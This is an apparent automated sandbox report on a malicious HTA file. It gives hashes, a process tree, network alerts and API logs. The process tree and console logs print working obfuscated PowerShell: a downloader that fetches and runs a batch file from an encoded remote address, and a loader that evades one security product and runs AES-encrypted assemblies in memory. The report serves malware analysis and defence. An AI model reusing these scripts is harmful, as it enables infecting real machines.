Summary | ZeroBOX

2.hta

Generic Malware Downloader Antivirus HTTP ScreenShot Create Service KeyLogger Internet API P2P DGA Http API FTP Socket Escalate priviledges DNS Code injection PWS Sniff Audio Steal credential GIF Format AntiDebug Lnk Format ZIP Format AntiVM PowerShell
Category Machine Started Completed
FILE s1_win7_x6403_us May 9, 2024, 10:59 a.m. May 9, 2024, 11:01 a.m.
Size 12.6KB
Type HTML document, ASCII text, with very long lines, with CRLF line terminators
MD5 bb537c9f88a70e710c5993e3fe383bb6
SHA256 24334d15049c3647679a7f7577eb33d7544b43580408b6eba846ae0c2fbe2381
CRC32 74EEF9CF
ssdeep 384:Io2d/lA4fKKbE4ZKKbFi4uKKbtLepKL737uLNeLaNRj5pxgiYT3SJKSel2cT3SPs:Iz1ljKKbJKKbiKKbReKosmXjdDKQVK0k
Yara None matched

  • mshta.exe "C:\Windows\System32\mshta.exe" C:\Users\test22\AppData\Local\Temp\2.hta

    1932
    • powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy UnRestricted function eakRTR($olGAKmJla, $APxUXinG){[IO.File]::WriteAllBytes($olGAKmJla, $APxUXinG)};function atSKPKjLPuNX($olGAKmJla){if($olGAKmJla.EndsWith((DBOaHKYUk @(47355,47409,47417,47417))) -eq $True){rundll32.exe $olGAKmJla }elseif($olGAKmJla.EndsWith((DBOaHKYUk @(47355,47421,47424,47358))) -eq $True){powershell.exe -ExecutionPolicy unrestricted -File $olGAKmJla}elseif($olGAKmJla.EndsWith((DBOaHKYUk @(47355,47418,47424,47414))) -eq $True){misexec /qn /i $olGAKmJla}else{Start-Process $olGAKmJla}};function kGGuIquLOGYrTJYBG($ZaWpuswOXzBXNNJSWq){$nLQGUpAAnpfjrqYAky = New-Object (DBOaHKYUk @(47387,47410,47425,47355,47396,47410,47407,47376,47417,47414,47410,47419,47425));[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::TLS12;$APxUXinG = $nLQGUpAAnpfjrqYAky.DownloadData($ZaWpuswOXzBXNNJSWq);return $APxUXinG};function DBOaHKYUk($yvpNKg){$lrsoAtOZxTlq=47309;$qTGhpuFGinHLyNcL=$Null;foreach($UbAZBkVcw in $yvpNKg){$qTGhpuFGinHLyNcL+=[char]($UbAZBkVcw-$lrsoAtOZxTlq)};return $qTGhpuFGinHLyNcL};function LztbGmYEiJQs(){$QFvHDxxjhpnQC = $env:AppData + '\';$aldNWBtEYsFWYQcs = $QFvHDxxjhpnQC + '22.xlsx';If(Test-Path -Path $aldNWBtEYsFWYQcs){Invoke-Item $aldNWBtEYsFWYQcs;}Else{ $vAaZjEjBBMtrUakWGijG = kGGuIquLOGYrTJYBG (DBOaHKYUk @(47413,47425,47425,47421,47367,47356,47356,47358,47366,47360,47355,47359,47359,47359,47355,47366,47363,47355,47358,47359,47361,47367,47364,47359,47365,47364,47356,47359,47359,47355,47429,47417,47424,47429));eakRTR $aldNWBtEYsFWYQcs $vAaZjEjBBMtrUakWGijG;Invoke-Item $aldNWBtEYsFWYQcs;};$pXwqbI = $QFvHDxxjhpnQC + 'xD.bat'; if (Test-Path -Path $pXwqbI){atSKPKjLPuNX $pXwqbI;}Else{ $kuPmPEtni = kGGuIquLOGYrTJYBG (DBOaHKYUk @(47413,47425,47425,47421,47367,47356,47356,47358,47366,47360,47355,47359,47359,47359,47355,47366,47363,47355,47358,47359,47361,47367,47364,47359,47365,47364,47356,47429,47377,47355,47407,47406,47425));eakRTR $pXwqbI $kuPmPEtni;atSKPKjLPuNX $pXwqbI;};;;;}LztbGmYEiJQs;

      2084
      • EXCEL.EXE "C:\Program Files (x86)\Microsoft Office\Office15\EXCEL.EXE" /dde

        2248
      • cmd.exe cmd /c ""C:\Users\test22\AppData\Roaming\xD.bat" "

        2504
        • cmd.exe C:\Windows\system32\cmd.exe /K "C:\Users\test22\AppData\Roaming\xD.bat"

          2588
          • cmd.exe C:\Windows\system32\cmd.exe /S /D /c" echo $host.UI.RawUI.WindowTitle='C:\Users\test22\AppData\Roaming\xD.bat';$wGtl='LowQGLawQGLdwQGL'.Replace('wQGL', ''),'ElfxQUemfxQUenfxQUtAfxQUtfxQU'.Replace('fxQU', ''),'FUtjArUtjAomUtjABasUtjAe6UtjA4UtjAStrUtjAingUtjA'.Replace('UtjA', ''),'GeOQGltOQGlCurOQGlrOQGleOQGlntOQGlPrOQGloOQGlcesOQGlsOQGl'.Replace('OQGl', ''),'EsWNTntsWNTryPsWNToisWNTntsWNT'.Replace('sWNT', ''),'MaieNXOnMoeNXOdueNXOleNXOeeNXO'.Replace('eNXO', ''),'TrOcAbansOcAbfoOcAbrmFOcAbiOcAbnaOcAblBOcAblocOcAbkOcAb'.Replace('OcAb', ''),'Splwhduiwhdutwhdu'.Replace('whdu', ''),'InPTvuvokPTvuePTvu'.Replace('PTvu', ''),'CreUFVYaUFVYteUFVYDUFVYecUFVYryUFVYptUFVYoUFVYrUFVY'.Replace('UFVY', ''),'CharscrngerscrErscrxrscrtrscrerscrnsirscrorscrnrscr'.Replace('rscr', ''),'DebAhhcobAhhmbAhhprbAhhebAhhssbAhh'.Replace('bAhh', ''),'CwGRRopwGRRyTwGRRowGRR'.Replace('wGRR', ''),'ReygHbadygHbLiygHbneygHbsygHb'.Replace('ygHb', '');powershell -w hidden;$modules=[System.Diagnostics.Process]::($wGtl[3])().Modules;if ($modules -match 'hmpalert.dll') { exit; };function kqXMT($FvMLi){$yuVsf=[System.Security.Cryptography.Aes]::Create();$yuVsf.Mode=[System.Security.Cryptography.CipherMode]::CBC;$yuVsf.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7;$yuVsf.Key=[System.Convert]::($wGtl[2])('ZPmarITq2qISishmMhAN5SieN3zSIyXHEEMkcAYPN4Y=');$yuVsf.IV=[System.Convert]::($wGtl[2])('pKL8KnX4ANOD8Ef8OdOJnQ==');$fXTHi=$yuVsf.($wGtl[9])();$KWagE=$fXTHi.($wGtl[6])($FvMLi,0,$FvMLi.Length);$fXTHi.Dispose();$yuVsf.Dispose();$KWagE;}function ymbNX($FvMLi){$BKlMi=New-Object System.IO.MemoryStream(,$FvMLi);$CmUjH=New-Object System.IO.MemoryStream;$xWgPw=New-Object System.IO.Compression.GZipStream($BKlMi,[IO.Compression.CompressionMode]::($wGtl[11]));$xWgPw.($wGtl[12])($CmUjH);$xWgPw.Dispose();$BKlMi.Dispose();$CmUjH.Dispose();$CmUjH.ToArray();}$pYGwG=[System.IO.File]::($wGtl[13])([Console]::Title);$BqtDQ=ymbNX (kqXMT ([Convert]::($wGtl[2])([System.Linq.Enumerable]::($wGtl[1])($pYGwG, 5).Substring(2))));$fdKjl=ymbNX (kqXMT ([Convert]::($wGtl[2])([System.Linq.Enumerable]::($wGtl[1])($pYGwG, 6).Substring(2))));[System.Reflection.Assembly]::($wGtl[0])([byte[]]$fdKjl).($wGtl[4]).($wGtl[8])($null,$null);[System.Reflection.Assembly]::($wGtl[0])([byte[]]$BqtDQ).($wGtl[4]).($wGtl[8])($null,$null); "

            2728
          • powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

            2780

Name Response Post-Analysis Lookup
No hosts contacted.
IP Address Status Action
193.222.96.124 Active Moloch

Suricata Alerts

Flow SID Signature Category
TCP 193.222.96.124:7287 -> 192.168.56.103:49164 2400036 ET DROP Spamhaus DROP Listed Traffic Inbound group 37 Misc Attack
TCP 192.168.56.103:49164 -> 193.222.96.124:7287 2027254 ET INFO Dotted Quad Host XLSX Request Potentially Bad Traffic

Suricata TLS

No Suricata TLS

Time & API Arguments Status Return Repeated

GetComputerNameW

computer_name: TEST22-PC
1 1 0

GetComputerNameW

computer_name: TEST22-PC
1 1 0

GetComputerNameW

computer_name: TEST22-PC
1 1 0

GetComputerNameW

computer_name: TEST22-PC
1 1 0

GetComputerNameA

computer_name: TEST22-PC
1 1 0

GetComputerNameW

computer_name: TEST22-PC
1 1 0

GetComputerNameW

computer_name: TEST22-PC
1 1 0

GetComputerNameW

computer_name: TEST22-PC
1 1 0

GetComputerNameW

computer_name: TEST22-PC
1 1 0

GetComputerNameW

computer_name: TEST22-PC
1 1 0

GetComputerNameW

computer_name: TEST22-PC
1 1 0

GetComputerNameW

computer_name: TEST22-PC
1 1 0

GetComputerNameW

computer_name: TEST22-PC
1 1 0

GetComputerNameW

computer_name: TEST22-PC
1 1 0

GetComputerNameW

computer_name: TEST22-PC
1 1 0

GetComputerNameW

computer_name: TEST22-PC
1 1 0

GetComputerNameW

computer_name: TEST22-PC
1 1 0

GetComputerNameW

computer_name: TEST22-PC
1 1 0

GetComputerNameW

computer_name: TEST22-PC
1 1 0

GetComputerNameW

computer_name: TEST22-PC
1 1 0

GetComputerNameW

computer_name: TEST22-PC
1 1 0

GetComputerNameA

computer_name: TEST22-PC
1 1 0

GetComputerNameW

computer_name: TEST22-PC
1 1 0
Time & API Arguments Status Return Repeated

IsDebuggerPresent

0 0

IsDebuggerPresent

0 0

IsDebuggerPresent

0 0

IsDebuggerPresent

0 0

IsDebuggerPresent

0 0

IsDebuggerPresent

0 0

IsDebuggerPresent

0 0

IsDebuggerPresent

0 0

IsDebuggerPresent

0 0

IsDebuggerPresent

0 0

IsDebuggerPresent

0 0
Time & API Arguments Status Return Repeated

WriteConsoleW

buffer: Exception setting "SecurityProtocol": "Cannot convert null to type "System.Net.
console_handle: 0x00000023
1 1 0

WriteConsoleW

buffer: SecurityProtocolType" due to invalid enumeration values. Specify one of the fol
console_handle: 0x0000002f
1 1 0

WriteConsoleW

buffer: lowing enumeration values and try again. The possible enumeration values are "S
console_handle: 0x0000003b
1 1 0

WriteConsoleW

buffer: sl3, Tls"."
console_handle: 0x00000047
1 1 0

WriteConsoleW

buffer: At line:1 char:699
console_handle: 0x00000053
1 1 0

WriteConsoleW

buffer: + function eakRTR($olGAKmJla, $APxUXinG){[IO.File]::WriteAllBytes($olGAKmJla, $
console_handle: 0x0000005f
1 1 0

WriteConsoleW

buffer: APxUXinG)};function atSKPKjLPuNX($olGAKmJla){if($olGAKmJla.EndsWith((DBOaHKYUk
console_handle: 0x0000006b
1 1 0

WriteConsoleW

buffer: @(47355,47409,47417,47417))) -eq $True){rundll32.exe $olGAKmJla }elseif($olGAKm
console_handle: 0x00000077
1 1 0

WriteConsoleW

buffer: Jla.EndsWith((DBOaHKYUk @(47355,47421,47424,47358))) -eq $True){powershell.exe
console_handle: 0x00000083
1 1 0

WriteConsoleW

buffer: -ExecutionPolicy unrestricted -File $olGAKmJla}elseif($olGAKmJla.EndsWith((DBOa
console_handle: 0x0000008f
1 1 0

WriteConsoleW

buffer: HKYUk @(47355,47418,47424,47414))) -eq $True){misexec /qn /i $olGAKmJla}else{St
console_handle: 0x0000009b
1 1 0

WriteConsoleW

buffer: art-Process $olGAKmJla}};function kGGuIquLOGYrTJYBG($ZaWpuswOXzBXNNJSWq){$nLQGU
console_handle: 0x000000a7
1 1 0

WriteConsoleW

buffer: pAAnpfjrqYAky = New-Object (DBOaHKYUk @(47387,47410,47425,47355,47396,47410,474
console_handle: 0x000000b3
1 1 0

WriteConsoleW

buffer: 07,47376,47417,47414,47410,47419,47425));[Net.ServicePointManager]:: <<<< Secur
console_handle: 0x000000bf
1 1 0

WriteConsoleW

buffer: ityProtocol = [Net.SecurityProtocolType]::TLS12;$APxUXinG = $nLQGUpAAnpfjrqYAky
console_handle: 0x000000cb
1 1 0

WriteConsoleW

buffer: .DownloadData($ZaWpuswOXzBXNNJSWq);return $APxUXinG};function DBOaHKYUk($yvpNKg
console_handle: 0x000000d7
1 1 0

WriteConsoleW

buffer: ){$lrsoAtOZxTlq=47309;$qTGhpuFGinHLyNcL=$Null;foreach($UbAZBkVcw in $yvpNKg){$q
console_handle: 0x000000e3
1 1 0

WriteConsoleW

buffer: TGhpuFGinHLyNcL+=[char]($UbAZBkVcw-$lrsoAtOZxTlq)};return $qTGhpuFGinHLyNcL};fu
console_handle: 0x000000ef
1 1 0

WriteConsoleW

buffer: nction LztbGmYEiJQs(){$QFvHDxxjhpnQC = $env:AppData + '\';$aldNWBtEYsFWYQcs = $
console_handle: 0x000000fb
1 1 0

WriteConsoleW

buffer: QFvHDxxjhpnQC + '22.xlsx';If(Test-Path -Path $aldNWBtEYsFWYQcs){Invoke-Item $al
console_handle: 0x00000107
1 1 0

WriteConsoleW

buffer: dNWBtEYsFWYQcs;}Else{ $vAaZjEjBBMtrUakWGijG = kGGuIquLOGYrTJYBG (DBOaHKYUk @(47
console_handle: 0x00000113
1 1 0

WriteConsoleW

buffer: 6,47359,47359,47355,47429,47417,47424,47429));eakRTR $aldNWBtEYsFWYQcs $vAaZjEj
console_handle: 0x00000137
1 1 0

WriteConsoleW

buffer: BBMtrUakWGijG;Invoke-Item $aldNWBtEYsFWYQcs;};$pXwqbI = $QFvHDxxjhpnQC + 'xD.ba
console_handle: 0x00000143
1 1 0

WriteConsoleW

buffer: t'; if (Test-Path -Path $pXwqbI){atSKPKjLPuNX $pXwqbI;}Else{ $kuPmPEtni = kGGuI
console_handle: 0x0000014f
1 1 0

WriteConsoleW

buffer: quLOGYrTJYBG (DBOaHKYUk @(47413,47425,47425,47421,47367,47356,47356,47358,47366
console_handle: 0x0000015b
1 1 0

WriteConsoleW

buffer: 47364,47359,47365,47364,47356,47429,47377,47355,47407,47406,47425));eakRTR $pXw
console_handle: 0x00000173
1 1 0

WriteConsoleW

buffer: qbI $kuPmPEtni;atSKPKjLPuNX $pXwqbI;};;;;}LztbGmYEiJQs;
console_handle: 0x0000017f
1 1 0

WriteConsoleW

buffer: + CategoryInfo : InvalidOperation: (:) [], RuntimeException
console_handle: 0x0000018b
1 1 0

WriteConsoleW

buffer: + FullyQualifiedErrorId : PropertyAssignmentException
console_handle: 0x00000197
1 1 0

WriteConsoleW

buffer: Exception setting "SecurityProtocol": "Cannot convert null to type "System.Net.
console_handle: 0x00000023
1 1 0

WriteConsoleW

buffer: SecurityProtocolType" due to invalid enumeration values. Specify one of the fol
console_handle: 0x0000002f
1 1 0

WriteConsoleW

buffer: lowing enumeration values and try again. The possible enumeration values are "S
console_handle: 0x0000003b
1 1 0

WriteConsoleW

buffer: sl3, Tls"."
console_handle: 0x00000047
1 1 0

WriteConsoleW

buffer: At line:1 char:699
console_handle: 0x00000053
1 1 0

WriteConsoleW

buffer: + function eakRTR($olGAKmJla, $APxUXinG){[IO.File]::WriteAllBytes($olGAKmJla, $
console_handle: 0x0000005f
1 1 0

WriteConsoleW

buffer: APxUXinG)};function atSKPKjLPuNX($olGAKmJla){if($olGAKmJla.EndsWith((DBOaHKYUk
console_handle: 0x0000006b
1 1 0

WriteConsoleW

buffer: @(47355,47409,47417,47417))) -eq $True){rundll32.exe $olGAKmJla }elseif($olGAKm
console_handle: 0x00000077
1 1 0

WriteConsoleW

buffer: Jla.EndsWith((DBOaHKYUk @(47355,47421,47424,47358))) -eq $True){powershell.exe
console_handle: 0x00000083
1 1 0

WriteConsoleW

buffer: -ExecutionPolicy unrestricted -File $olGAKmJla}elseif($olGAKmJla.EndsWith((DBOa
console_handle: 0x0000008f
1 1 0

WriteConsoleW

buffer: HKYUk @(47355,47418,47424,47414))) -eq $True){misexec /qn /i $olGAKmJla}else{St
console_handle: 0x0000009b
1 1 0

WriteConsoleW

buffer: art-Process $olGAKmJla}};function kGGuIquLOGYrTJYBG($ZaWpuswOXzBXNNJSWq){$nLQGU
console_handle: 0x000000a7
1 1 0

WriteConsoleW

buffer: pAAnpfjrqYAky = New-Object (DBOaHKYUk @(47387,47410,47425,47355,47396,47410,474
console_handle: 0x000000b3
1 1 0

WriteConsoleW

buffer: 07,47376,47417,47414,47410,47419,47425));[Net.ServicePointManager]:: <<<< Secur
console_handle: 0x000000bf
1 1 0

WriteConsoleW

buffer: ityProtocol = [Net.SecurityProtocolType]::TLS12;$APxUXinG = $nLQGUpAAnpfjrqYAky
console_handle: 0x000000cb
1 1 0

WriteConsoleW

buffer: .DownloadData($ZaWpuswOXzBXNNJSWq);return $APxUXinG};function DBOaHKYUk($yvpNKg
console_handle: 0x000000d7
1 1 0

WriteConsoleW

buffer: ){$lrsoAtOZxTlq=47309;$qTGhpuFGinHLyNcL=$Null;foreach($UbAZBkVcw in $yvpNKg){$q
console_handle: 0x000000e3
1 1 0

WriteConsoleW

buffer: TGhpuFGinHLyNcL+=[char]($UbAZBkVcw-$lrsoAtOZxTlq)};return $qTGhpuFGinHLyNcL};fu
console_handle: 0x000000ef
1 1 0

WriteConsoleW

buffer: nction LztbGmYEiJQs(){$QFvHDxxjhpnQC = $env:AppData + '\';$aldNWBtEYsFWYQcs = $
console_handle: 0x000000fb
1 1 0

WriteConsoleW

buffer: QFvHDxxjhpnQC + '22.xlsx';If(Test-Path -Path $aldNWBtEYsFWYQcs){Invoke-Item $al
console_handle: 0x00000107
1 1 0

WriteConsoleW

buffer: dNWBtEYsFWYQcs;}Else{ $vAaZjEjBBMtrUakWGijG = kGGuIquLOGYrTJYBG (DBOaHKYUk @(47
console_handle: 0x00000113
1 1 0
Time & API Arguments Status Return Repeated

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x0047b560
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x0047b6a0
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x0047b6a0
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x0047b6a0
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x0047aea0
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x0047aea0
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x0047aea0
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x0047aea0
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x0047aea0
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x0047aea0
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x0047b6a0
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x0047b6a0
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x0047b6a0
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x0047bc20
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x0047bc20
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x0047bc20
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x0047b920
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x0047bc20
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x0047bc20
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x0047bc20
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x0047bc20
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x0047bc20
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x0047bc20
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x0047bc20
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x0047b9e0
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x0047b9e0
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x0047b9e0
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x0047b9e0
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x0047b9e0
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x0047b9e0
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x0047b9e0
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x0047b9e0
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x0047b9e0
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x0047b9e0
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x0047b9e0
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x0047b9e0
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x0047b9e0
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x0047b9e0
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x0047ba60
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x0047ba60
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x0047ba60
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x0047ba60
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x0047ba60
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x0047ba60
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x0047ba60
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x0047ba60
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x0047b960
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x0047b960
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptGenKey

crypto_handle: 0x07e3b5b0
algorithm_identifier: 0x00006610 ()
flags: 1
key: f w шkã2%V¶¹e'8`Ñtù`ڛ½ë™Ì÷I˜ùé
provider_handle: 0x06488c98
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x07e3b5b0
flags: 0
crypto_export_handle: 0x07e3b4f0
blob_type: 1
1 1 0
registry HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Office\15.0\Registration\{91150000-0011-0000-0000-0000000FF1CE}\DigitalProductID
Time & API Arguments Status Return Repeated

GlobalMemoryStatusEx

1 1 0
Time & API Arguments Status Return Repeated

__exception__

stacktrace:
RpcRaiseException+0x42 I_RpcExceptionFilter-0x12 rpcrt4+0x2374b @ 0x754c374b
NdrAllocate+0x5c8 RpcBindingFromStringBindingA-0xca4 rpcrt4+0x42b08 @ 0x754e2b08
NdrGetBuffer+0xf4 NdrSendReceive-0x6 rpcrt4+0x1801a @ 0x754b801a
SLClose-0x28c osppc+0x2cb5 @ 0x67212cb5
SLLoadApplicationPolicies+0xb30 SLCallServer-0x31f osppc+0x15629 @ 0x67225629
SLClose+0x4d1 SLpBeginGenuineTicketTransaction-0x4703 osppc+0x3412 @ 0x67213412
SLpGetTokenActivationGrantInfo+0xd8 SLpGenerateTokenActivationChallenge-0xad osppc+0x129af @ 0x672229af
SLGetTokenActivationGrants+0x721 SLGetTokenActivationCertificates-0x7e7 osppcext+0x5a648 @ 0x7343a648
_MsoWzFromIhtk@4+0x73207 mso+0x1404a94 @ 0x6cce4a94
_MsoWzFromIhtk@4+0x72f96 mso+0x1404823 @ 0x6cce4823
_MsoDwGimmeUserInstallBehavior@8+0x1ad15 _MsoHrShowMetSharedNotebooksDlg@20-0x7a9d0 mso+0xcc30d3 @ 0x6c5a30d3
_MsoDwGimmeUserInstallBehavior@8+0x1aa61 _MsoHrShowMetSharedNotebooksDlg@20-0x7ac84 mso+0xcc2e1f @ 0x6c5a2e1f
_MsoFreeCvsList@4+0x261dac _MsoPwlfFromFlinfo@8-0x3674 mso+0x4e2b05 @ 0x6bdc2b05
_MsoFreeCvsList@4+0x2616fd _MsoPwlfFromFlinfo@8-0x3d23 mso+0x4e2456 @ 0x6bdc2456
0x389631
_MsoDwGimmeUserInstallBehavior@8+0x1798b _MsoHrShowMetSharedNotebooksDlg@20-0x7dd5a mso+0xcbfd49 @ 0x6c59fd49
_MsoHrSetupHTMLImport@8+0x27d9 _MsoHrOscServicesManagerSharepointURL@8-0x9611 mso+0x2008cc @ 0x6bae08cc
_MsoFIEPolicyAndVersion@8+0x37cd _MsoTelemetryOnEndVBAMacroCallback@0-0x3f32 mso+0x1efa61 @ 0x6bacfa61
_MsoFIEPolicyAndVersion@8+0x3574 _MsoTelemetryOnEndVBAMacroCallback@0-0x418b mso+0x1ef808 @ 0x6bacf808
_MsoFIEPolicyAndVersion@8+0x3534 _MsoTelemetryOnEndVBAMacroCallback@0-0x41cb mso+0x1ef7c8 @ 0x6bacf7c8
_MsoFEnsureMsoTypelib@0+0x2a5 _MsoInitShrGlobal@4-0x1bdf mso+0x23b6d @ 0x6b903b6d
_MsoExtTextOutW@32+0x85f _MsoFWndProcNeeded@4-0x4a1 mso+0x222ad @ 0x6b9022ad
_MsoFGetTbShowKbdShortcuts@0+0x8b11 _MsoFDigitCh@4-0xbf35 mso+0x1b522d @ 0x6ba9522d
_MsoFGetTbShowKbdShortcuts@0+0x8a6d _MsoFDigitCh@4-0xbfd9 mso+0x1b5189 @ 0x6ba95189
_MsoFGetTbShowKbdShortcuts@0+0x795f _MsoFDigitCh@4-0xd0e7 mso+0x1b407b @ 0x6ba9407b
_MsoFGetTbShowKbdShortcuts@0+0x788d _MsoFDigitCh@4-0xd1b9 mso+0x1b3fa9 @ 0x6ba93fa9
_MsoFGetTbShowKbdShortcuts@0+0x784f _MsoFDigitCh@4-0xd1f7 mso+0x1b3f6b @ 0x6ba93f6b
MdCallBack12-0x64a760 excel+0x37a4a @ 0x1207a4a
MdCallBack12-0x64de96 excel+0x34314 @ 0x1204314
MdCallBack12-0x67d476 excel+0x4d34 @ 0x11d4d34
MdCallBack12-0x67d76a excel+0x4a40 @ 0x11d4a40
BaseThreadInitThunk+0x12 VerifyConsoleIoHandle-0xb3 kernel32+0x133ca @ 0x757f33ca
RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x778d9ed2
RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x778d9ea5

exception.instruction_r: c9 c2 10 00 cc cc cc cc cc 8b ff 55 8b ec 56 8b
exception.symbol: RaiseException+0x58 CloseHandle-0x9 kernelbase+0xb727
exception.instruction: leave
exception.module: KERNELBASE.dll
exception.exception_code: 0xc004f011
exception.offset: 46887
exception.address: 0x7559b727
registers.esp: 3338720
registers.edi: 3338884
registers.eax: 3338720
registers.ebp: 3338800
registers.edx: 0
registers.ebx: 3339936
registers.esi: 3221549073
registers.ecx: 2147483648
1 0 0
Time & API Arguments Status Return Repeated

NtAllocateVirtualMemory

process_identifier: 2084
region_size: 327680
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x024d0000
allocation_type: 8192 (MEM_RESERVE)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2084
region_size: 4096
